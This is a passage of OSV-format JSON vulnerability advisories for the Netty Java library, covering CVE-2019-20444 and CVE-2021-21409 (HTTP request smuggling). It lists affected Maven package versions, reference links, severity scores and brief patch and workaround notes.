"4.0.34.Final", "4.0.35.Final", "4.0.36.Final", "4.0.37.Final", "4.0.38.Final", "4.0.39.Final", "4.0.4.Final", "4.0.40.Final", "4.0.41.Final", "4.0.42.Final", "4.0.43.Final", "4.0.44.Final", "4.0.45.Final", "4.0.46.Final", "4.0.47.Final", "4.0.48.Final", "4.0.49.Final", "4.0.5.Final", "4.0.50.Final", "4.0.51.Final", "4.0.52.Final", "4.0.53.Final", "4.0.54.Final", "4.0.55.Final", "4.0.56.Final", "4.0.6.Final", "4.0.7.Final", "4.0.8.Final", "4.0.9.Final", "4.1.0.Beta1", "4.1.0.Beta2", "4.1.0.Beta3", "4.1.0.Beta4", "4.1.0.Beta5", "4.1.0.Beta6", "4.1.0.Beta7", "4.1.0.Beta8", "4.1.0.CR1", "4.1.0.CR2", "4.1.0.CR3", "4.1.0.CR4", "4.1.0.CR5", "4.1.0.CR6", "4.1.0.CR7", "4.1.0.Final", "4.1.1.Final", "4.1.10.Final", "4.1.11.Final", "4.1.12.Final", "4.1.13.Final", "4.1.14.Final", "4.1.15.Final", "4.1.16.Final", "4.1.17.Final", "4.1.18.Final", "4.1.19.Final", "4.1.2.Final", "4.1.20.Final", "4.1.21.Final", "4.1.22.Final", "4.1.23.Final", "4.1.24.Final", "4.1.25.Final", "4.1.26.Final", "4.1.27.Final", "4.1.28.Final", "4.1.29.Final", "4.1.3.Final", "4.1.30.Final", "4.1.31.Final", "4.1.32.Final", "4.1.33.Final", "4.1.34.Final", "4.1.35.Final", "4.1.36.Final", "4.1.37.Final", "4.1.38.Final", "4.1.39.Final", "4.1.4.Final", "4.1.40.Final", "4.1.41.Final", "4.1.42.Final", "4.1.43.Final", "4.1.5.Final", "4.1.6.Final", "4.1.7.Final", "4.1.8.Final", "4.1.9.Final" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/02/GHSA-cqqj-4p63-rrmm/GHSA-cqqj-4p63-rrmm.json" } }, { "package": { "name": "org.jboss.netty:netty", "ecosystem": "Maven", "purl": "pkg:maven/org.jboss.netty/netty" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" } ] } ], "versions": [ "3.0.0.CR1", "3.0.0.CR2", "3.0.0.CR3", "3.0.0.CR4", "3.0.0.CR5", "3.0.0.GA", "3.0.1.GA", "3.0.2.GA", "3.1.0.ALPHA1", "3.1.0.ALPHA2", "3.1.0.ALPHA3", "3.1.0.ALPHA4", "3.1.0.BETA1", "3.1.0.BETA2", "3.1.0.BETA3", "3.1.0.CR1", "3.1.0.GA", "3.1.1.GA", "3.1.2.GA", "3.1.3.GA", "3.1.4.GA", "3.1.5.GA", "3.2.0.ALPHA1", "3.2.0.ALPHA2", "3.2.0.ALPHA3", "3.2.0.ALPHA4", "3.2.0.BETA1", "3.2.0.CR1", "3.2.0.Final", "3.2.1.Final", "3.2.10.Final", "3.2.2.Final", "3.2.3.Final", "3.2.4.Final", "3.2.5.Final", "3.2.6.Final", "3.2.7.Final", "3.2.8.Final", "3.2.9.Final" ], "database_specific": { "last_known_affected_version_range": "\u003c 4.0.0", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/02/GHSA-cqqj-4p63-rrmm/GHSA-cqqj-4p63-rrmm.json" } }, { "package": { "name": "io.netty:netty", "ecosystem": "Maven", "purl": "pkg:maven/io.netty/netty" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" } ] } ], "versions": [ "3.10.0.Final", "3.10.1.Final", "3.10.2.Final", "3.10.3.Final", "3.10.4.Final", "3.10.5.Final", "3.10.6.Final", "3.3.0.Final", "3.3.1.Final", "3.4.0.Alpha1", "3.4.0.Alpha2", "3.4.0.Beta1", "3.4.0.Final", "3.4.1.Final", "3.4.2.Final", "3.4.3.Final", "3.4.4.Final", "3.4.5.Final", "3.4.6.Final", "3.5.0.Beta1", "3.5.0.Final", "3.5.1.Final", "3.5.10.Final", "3.5.11.Final", "3.5.12.Final", "3.5.13.Final", "3.5.2.Final", "3.5.3.Final", "3.5.4.Final", "3.5.5.Final", "3.5.6.Final", "3.5.7.Final", "3.5.8.Final", "3.5.9.Final", "3.6.0.Beta1", "3.6.0.Final", "3.6.1.Final", "3.6.10.Final", "3.6.2.Final", "3.6.3.Final", "3.6.4.Final", "3.6.5.Final", "3.6.6.Final", "3.6.7.Final", "3.6.8.Final", "3.6.9.Final", "3.7.0.Final", "3.7.1.Final", "3.8.0.Final", "3.8.1.Final", "3.8.2.Final", "3.8.3.Final", "3.9.0.Final", "3.9.1.1.Final", "3.9.1.Final", "3.9.2.Final", "3.9.3.Final", "3.9.4.Final", "3.9.5.Final", "3.9.6.Final", "3.9.7.Final", "3.9.8.Final", "3.9.9.Final", "4.0.0.Alpha1", "4.0.0.Alpha2", "4.0.0.Alpha3", "4.0.0.Alpha4", "4.0.0.Alpha5", "4.0.0.Alpha6", "4.0.0.Alpha7", "4.0.0.Alpha8" ], "database_specific": { "last_known_affected_version_range": "\u003c 4.0.0", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2020/02/GHSA-cqqj-4p63-rrmm/GHSA-cqqj-4p63-rrmm.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-20444" }, { "type": "WEB", "url": "https://github.com/netty/netty/issues/9866" }, { "type": "WEB", "url": "https://github.com/netty/netty/pull/9871/files#diff-e26989b9171ef22c27c9f7d80689cfb059d568c9bd10e75970d96c02d0654878" }, { "type": "WEB", "url": "https://github.com/netty/netty/pull/9871" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra9fbfe7d4830ae675bf34c7c0f8c22fc8a4099f65706c1bc4f54c593%40%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra9fbfe7d4830ae675bf34c7c0f8c22fc8a4099f65706c1bc4f54c593@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/raaac04b7567c554786132144bea3dcb72568edd410c1e6f0101742e7%40%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/raaac04b7567c554786132144bea3dcb72568edd410c1e6f0101742e7@%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb3361f6c6a5f834ad3db5e998c352760d393c0891b8d3bea90baa836%40%3Ccommon-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb3361f6c6a5f834ad3db5e998c352760d393c0891b8d3bea90baa836@%3Ccommon-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb84c57670ec48ef23f4d07973b7fa69f629b8e7fcfb48874362feb6f%40%3Ccommits.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rb84c57670ec48ef23f4d07973b7fa69f629b8e7fcfb48874362feb6f@%3Ccommits.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc7eb5634b71d284483e58665b22bf274a69bd184d9bd7ede52015d91%40%3Ccommon-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rc7eb5634b71d284483e58665b22bf274a69bd184d9bd7ede52015d91@%3Ccommon-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rcb2c59428f34d4757702f9ae739a8795bda7bea97b857e708a9c62c6%40%3Ccommon-commits.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rcb2c59428f34d4757702f9ae739a8795bda7bea97b857e708a9c62c6@%3Ccommon-commits.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rce71d33747010d32d31d90f5d737dae26291d96552f513a266c92fbb%40%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rce71d33747010d32d31d90f5d737dae26291d96552f513a266c92fbb@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd0e44e8ef71eeaaa3cf3d1b8b41eb25894372e2995ec908ce7624d26%40%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra2ace4bcb5cf487f72cbcbfa0f8cc08e755ec2b93d7e69f276148b08@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra2ace4bcb5cf487f72cbcbfa0f8cc08e755ec2b93d7e69f276148b08%40%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra1a71b576a45426af5ee65255be9596ff3181a342f4ba73b800db78f@%3Cdev.geode.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/ra1a71b576a45426af5ee65255be9596ff3181a342f4ba73b800db78f%40%3Cdev.geode.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9b20cdac704cf9a583400350e2d5b576fa8417c18ddb961201676c60@%3Ccommits.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r9b20cdac704cf9a583400350e2d5b576fa8417c18ddb961201676c60%40%3Ccommits.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r96e08f929234e8ba1ef4a93a0fd2870f535a1f9ab628fabc46115986@%3Cdev.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r96e08f929234e8ba1ef4a93a0fd2870f535a1f9ab628fabc46115986%40%3Cdev.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r959474dcf7f88565ed89f6252ca5a274419006cb71348f14764b183d@%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r959474dcf7f88565ed89f6252ca5a274419006cb71348f14764b183d%40%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r91e0fa345c86c128b75a4a791b4b503b53173ff4c13049ac7129d319@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r91e0fa345c86c128b75a4a791b4b503b53173ff4c13049ac7129d319%40%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r90030b0117490caed526e57271bf4d7f9b012091ac5083c895d16543@%3Ccommon-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r90030b0117490caed526e57271bf4d7f9b012091ac5083c895d16543%40%3Ccommon-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://www.debian.org/security/2021/dsa-4885" }, { "type": "WEB", "url": "https://usn.ubuntu.com/4532-1" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/TS6VX7OMXPDJIU5LRGUAHRK6MENAVJ46" }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/TS6VX7OMXPDJIU5LRGUAHRK6MENAVJ46" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2020/09/msg00004.html" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2020/09/msg00003.html" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2020/02/msg00018.html" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2020/02/msg00017.html" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rff210a24f3a924829790e69eaefa84820902b7b31f17c3bf2def9114@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rff210a24f3a924829790e69eaefa84820902b7b31f17c3bf2def9114%40%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rfb55f245b08d8a6ec0fb4dc159022227cd22de34c4419c2fbb18802b@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rfb55f245b08d8a6ec0fb4dc159022227cd22de34c4419c2fbb18802b%40%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf5b2dfb7401666a19915f8eaef3ba9f5c3386e2066fcd2ae66e16a2f@%3Cdev.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf5b2dfb7401666a19915f8eaef3ba9f5c3386e2066fcd2ae66e16a2f%40%3Cdev.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf2bf8e2eb0a03227f5bc100b544113f8cafea01e887bb068e8d1fa41@%3Ccommon-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rf2bf8e2eb0a03227f5bc100b544113f8cafea01e887bb068e8d1fa41%40%3Ccommon-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re78eaef7d01ad65c370df30e45c686fffff00b37f7bfd78b26a08762@%3Ccommon-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re78eaef7d01ad65c370df30e45c686fffff00b37f7bfd78b26a08762%40%3Ccommon-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re45ee9256d3233c31d78e59ee59c7dc841c7fbd83d0769285b41e948@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re45ee9256d3233c31d78e59ee59c7dc841c7fbd83d0769285b41e948%40%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re0b78a3d0a4ba2cf9f4e14e1d05040bde9051d5c78071177186336c9@%3Ccommon-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/re0b78a3d0a4ba2cf9f4e14e1d05040bde9051d5c78071177186336c9%40%3Ccommon-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rdd5d243a5f8ed8b83c0104e321aa420e5e98792a95749e3c9a54c0b9@%3Ccommon-commits.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rdd5d243a5f8ed8b83c0104e321aa420e5e98792a95749e3c9a54c0b9%40%3Ccommon-commits.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rdb69125652311d0c41f6066ff44072a3642cf33a4b5e3c4f9c1ec9c2@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rdb69125652311d0c41f6066ff44072a3642cf33a4b5e3c4f9c1ec9c2%40%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd8f72411fb75b98d366400ae789966373b5c3eb3f511e717caf3e49e@%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd8f72411fb75b98d366400ae789966373b5c3eb3f511e717caf3e49e%40%3Cissues.flink.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/rd0e44e8ef71eeaaa3cf3d1b8b41eb25894372e2995ec908ce7624d26@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r310d2ce22304d5298ff87f10134f918c87919b452734f9841d95682d%40%3Ccommits.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2f2989b7815d809ff3fda8ce330f553e5f133505afd04ffbc135f35f@%3Cissues.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r2f2989b7815d809ff3fda8ce330f553e5f133505afd04ffbc135f35f%40%3Cissues.spark.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r205937c85817a911b0c72655c2377e7a2c9322d6ef6ce1b118d34d8d@%3Cdev.geode.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r205937c85817a911b0c72655c2377e7a2c9322d6ef6ce1b118d34d8d%40%3Cdev.geode.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1fcccf8bdb3531c28bc9aa605a6a1bea7e68cef6fc12e01faafb2fb5@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1fcccf8bdb3531c28bc9aa605a6a1bea7e68cef6fc12e01faafb2fb5%40%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1b103833cb5bc8466e24ff0ecc5e75b45a705334ab6a444e64e840a0@%3Cissues.bookkeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r1b103833cb5bc8466e24ff0ecc5e75b45a705334ab6a444e64e840a0%40%3Cissues.bookkeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r0f5e72d5f69b4720dfe64fcbc2da9afae949ed1e9cbffa84bb7d92d7@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r0f5e72d5f69b4720dfe64fcbc2da9afae949ed1e9cbffa84bb7d92d7%40%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r0c3d49bfdbc62fd3915676433cc5899c5506d06da1c552ef1b7923a5@%3Ccommon-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r0c3d49bfdbc62fd3915676433cc5899c5506d06da1c552ef1b7923a5%40%3Ccommon-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r0aa8b28e76ec01c697b15e161e6797e88fc8d406ed762e253401106e@%3Ccommits.camel.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r0aa8b28e76ec01c697b15e161e6797e88fc8d406ed762e253401106e%40%3Ccommits.camel.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r059b042bca47be53ff8a51fd04d95eb01bb683f1afa209db136e8cb7@%3Cdev.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r059b042bca47be53ff8a51fd04d95eb01bb683f1afa209db136e8cb7%40%3Cdev.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://github.com/poc-effectiveness/PoCAdaptation/tree/main/Adapted/CVE-2019-20444/5.0.0.Alpha1/exploit" }, { "type": "WEB", "url": "https://github.com/netty/netty/compare/netty-4.1.43.Final...netty-4.1.44.Final" }, { "type": "PACKAGE", "url": "https://github.com/netty/netty" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0811" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0806" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0805" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0804" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0606" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0605" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0601" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0567" }, { "type": "WEB", "url": "https://access.redhat.com/errata/RHSA-2020:0497" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r86befa74c5cd1482c711134104aec339bf7ae879f2c4437d7ec477d4@%3Ccommon-commits.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r86befa74c5cd1482c711134104aec339bf7ae879f2c4437d7ec477d4%40%3Ccommon-commits.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r8402d67fdfe9cf169f859d52a7670b28a08eff31e54b522cc1432532@%3Ccommon-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r8402d67fdfe9cf169f859d52a7670b28a08eff31e54b522cc1432532%40%3Ccommon-issues.hadoop.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r832724df393a7ef25ca4c7c2eb83ad2d6c21c74569acda5233f9f1ec@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r832724df393a7ef25ca4c7c2eb83ad2d6c21c74569acda5233f9f1ec%40%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r819aaeb9944bdcfca438dcc51f05650dc728daf64dfd7d774fc2499b@%3Ccommits.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r819aaeb9944bdcfca438dcc51f05650dc728daf64dfd7d774fc2499b%40%3Ccommits.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r804895eedd72c9ec67898286eb185e04df852b0dd5fe53cf5b6138f9@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r804895eedd72c9ec67898286eb185e04df852b0dd5fe53cf5b6138f9%40%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r7790b9d99696d9eddce8a8c96f13bb68460984294ea6fea3800143e4@%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r7790b9d99696d9eddce8a8c96f13bb68460984294ea6fea3800143e4%40%3Ccommits.pulsar.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r70b1ff22ee80e8101805b9a473116dd33265709007d2deb6f8c80bf2@%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r70b1ff22ee80e8101805b9a473116dd33265709007d2deb6f8c80bf2%40%3Ccommits.druid.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6945f3c346b7af89bbd3526a7c9b705b1e3569070ebcd0964bcedd7d@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r6945f3c346b7af89bbd3526a7c9b705b1e3569070ebcd0964bcedd7d%40%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r640eb9b3213058a963e18291f903fc1584e577f60035f941e32f760a@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r640eb9b3213058a963e18291f903fc1584e577f60035f941e32f760a%40%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r4d3f1d3e333d9c2b2f6e6ae8ed8750d4de03410ac294bcd12c7eefa3@%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r4d3f1d3e333d9c2b2f6e6ae8ed8750d4de03410ac294bcd12c7eefa3%40%3Ccommits.cassandra.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r4c675b2d0cc2a5e506b11ee10d60a378859ee340aca052e4c7ef4749@%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r4c675b2d0cc2a5e506b11ee10d60a378859ee340aca052e4c7ef4749%40%3Cnotifications.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r489886fe72a98768eed665474cba13bad8d6fe0654f24987706636c5@%3Cdev.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r489886fe72a98768eed665474cba13bad8d6fe0654f24987706636c5%40%3Cdev.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r36fcf538b28f2029e8b4f6b9a772f3b107913a78f09b095c5b153a62@%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r36fcf538b28f2029e8b4f6b9a772f3b107913a78f09b095c5b153a62%40%3Cissues.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r34912a9b1a5c269a77b8be94ef6fb6d1e9b3c69129719dc00f01cf0b@%3Cdev.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r34912a9b1a5c269a77b8be94ef6fb6d1e9b3c69129719dc00f01cf0b%40%3Cdev.zookeeper.apache.org%3E" }, { "type": "WEB", "url": "https://lists.apache.org/thread.html/r310d2ce22304d5298ff87f10134f918c87919b452734f9841d95682d@%3Ccommits.zookeeper.apache.org%3E" } ], "database_specific": { "cwe_ids": [ "CWE-444" ], "github_reviewed": true, "github_reviewed_at": "2020-02-20T20:54:33Z", "nvd_published_at": "2020-01-29T21:15:00Z", "severity": "CRITICAL" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-f256-j965-7f32", "published": "2021-03-30T15:10:38Z", "modified": "2025-01-14T08:57:35.768526Z", "aliases": [ "CVE-2021-21409" ], "related": [ "CGA-494w-f4g6-835m", "CGA-c2w9-39fx-cvc6", "CVE-2021-21409" ], "summary": "Possible request smuggling in HTTP/2 due missing validation of content-length", "details": "### Impact\nThe content-length header is not correctly validated if the request only use a single Http2HeaderFrame with the endStream set to to true. This could lead to request smuggling if the request is proxied to a remote peer and translated to HTTP/1.1\n\nThis is a followup of https://github.com/netty/netty/security/advisories/GHSA-wm47-8v5p-wjpj which did miss to fix this one case. \n\n### Patches\nThis was fixed as part of 4.1.61.Final\n\n### Workarounds\nValidation can be done by the user before proxy the request by validating the header.", "affected": [ { "package": { "name": "io.netty:netty-codec-http2", "ecosystem": "Maven", "purl": "pkg:maven/io.netty/netty-codec-http2" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "4.0.0" }, { "fixed": "4.1.61.Final" } ] } ], "versions": [ "4.1.0.Beta4", "4.1.0.Beta5", "4.1.0.Beta6", "4.1.0.Beta7", "4.1.0.Beta8", "4.1.0.CR1", "4.1.0.CR2", "4.1.0.CR3", "4.1.0.CR4", "4.1.0.CR5", "4.1.0.CR6", "4.1.0.CR7", "4.1.0.Final", "4.1.1.Final", "4.1.10.Final", "4.1.11.Final", "4.1.12.Final", "4.1.13.Final", "4.1.14.Final", "4.1.15.Final", "4.1.16.Final", "4.1.17.Final", "4.1.18.Final", "4.1.19.Final", "4.1.2.Final", "4.1.20.Final", "4.1.21.Final", "4.1.22.Final", "4.1.23.Final", "4.1.24.Final", "4.1.25.Final", "4.1.26.Final", "4.1.27.Final", "4.1.28.Final", "4.1.29.Final", "4.1.3.Final", "4.1.30.Final", "4.1.31.Final", "4.1.32.Final", "4.1.33.Final", "4.1.34.Final", "4.1.35.Final", "4.1.36.Final", "4.1.37.Final", "4.1.38.Final", "4.1.39.Final", "4.1.4.Final", "4.1.40.Final", "4.1.41.Final", "4.1.42.Final", "4.1.43.Final", "4.1.44.Final", "4.1.45.Final", "4.1.46.Final", "4.1.47.Final", "4.1.48.Final", "4.1.49.Final", "4.1.5.Final", "4.1.50.Final", "4.1.51.Final", "4.1.52.Final", "4.1.53.Final", "4.1.54.Final", "4.1.55.Final", "4.1.56.Final", "4.1.57.Final", "4.1.58.Final", "4.1.59.Final", "4.1.6.Final", "4.1.60.Final", "4.1.7.Final", "4.1.8.Final", "4.1.9.Final" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/03/GHSA-f256-j965-7f32/GHSA-f256-j965-7f32.json" } }, { "package": { "name": "org.jboss.netty:netty", "ecosystem": "Maven", "purl": "pkg:maven/org.jboss.netty/netty" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" } ] } ], "versions": [ "3.0.0.CR1", "3.0.0.CR2", "3.0.0.CR3", "3.0.0.CR4", "3.0.0.CR5", "3.0.0.GA", "3.0.1.GA", "3.0.2.GA", "3.1.0.ALPHA1", "3.1.0.ALPHA2", "3.1.0.ALPHA3", "3.1.0.ALPHA4", "3.1.0.BETA1", "3.1.0.BETA2", "3.1.0.BETA3", "3.1.0.CR1", "3.1.0.GA", "3.1.1.GA", "3.1.2.GA", "3.1.3.GA", "3.1.4.GA", "3.1.5.GA", "3.2.0.ALPHA1", "3.2.0.ALPHA2", "3.2.0.ALPHA3", "3.2.0.ALPHA4", "3.2.0.BETA1", "3.2.0.CR1", "3.2.0.Final", "3.2.1.Final", "3.2.10.Final", "3.2.2.Final", "3.2.3.Final", "3.2.4.Final", "3.2.5.Final", "3.2.6.Final", "3.2.7.Final", "3.2.8.Final", "3.2.9.Final" ], "database_specific": { "last_known_affected_version_range": "\u003c 4.0.0", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2021/03/GHSA-f256-j965-7f32/GHSA-f256-j965-7f32.json" } }, { "package": { "name": "io.netty:netty", "ecosystem": "Maven", "purl": "pkg:maven/io.netty/netty" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" } ] } ], "versions": [ "3.10.0.Final", "3.10.1.Final", "3.10.2.Final", "3.10.3.Final", "3.10.4.Final", "3.10.5.Final", "3.10.6.Final", "3.3.0.Final", "3.3.1.Final", "3.4.0.Alpha1", "3.4.0.Alpha2", "3.4.0.Beta1", "3.4.0.Final", "3.4.1.Final", "3.4.2.Final", "3.4.3.Final", "3.4.4.Final", "3.4.5.Final", "3.4.6.Final", "3.5.0.Beta1", "3.5.0.Final", "3.5.1.Final", "3.5.10.Final", "3.5.11.Final", "3.5.12.Final", 